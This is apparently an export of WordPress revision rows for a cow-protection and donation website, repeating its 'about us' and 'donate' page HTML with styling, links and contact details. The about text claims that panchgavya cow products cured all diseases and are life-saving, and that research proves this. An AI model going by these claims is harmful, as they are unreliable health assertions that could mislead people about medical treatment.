width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 11:07:53','2022-10-17 05:37:53','',1804,'https://gopalak.in/?p=1823',0,'revision','',0),(1824,1,'2022-10-17 11:07:53','2022-10-17 05:37:53','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 11:07:53','2022-10-17 05:37:53','',1804,'https://gopalak.in/?p=1824',0,'revision','',0),(1825,1,'2022-10-17 11:08:05','2022-10-17 05:38:05','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:08:05','2022-10-17 05:38:05','',1816,'https://gopalak.in/?p=1825',0,'revision','',0),(1826,1,'2022-10-17 11:08:05','2022-10-17 05:38:05','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:08:05','2022-10-17 05:38:05','',1816,'https://gopalak.in/?p=1826',0,'revision','',0),(1827,1,'2022-10-17 11:08:06','2022-10-17 05:38:06','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:08:06','2022-10-17 05:38:06','',1816,'https://gopalak.in/?p=1827',0,'revision','',0),(1828,1,'2022-10-17 11:17:30','2022-10-17 05:47:30','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 11:17:30','2022-10-17 05:47:30','',1804,'https://gopalak.in/?p=1828',0,'revision','',0),(1829,1,'2022-10-17 11:17:52','2022-10-17 05:47:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:17:52','2022-10-17 05:47:52','',1816,'https://gopalak.in/?p=1829',0,'revision','',0),(1830,1,'2022-10-17 11:23:19','2022-10-17 05:53:19','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box 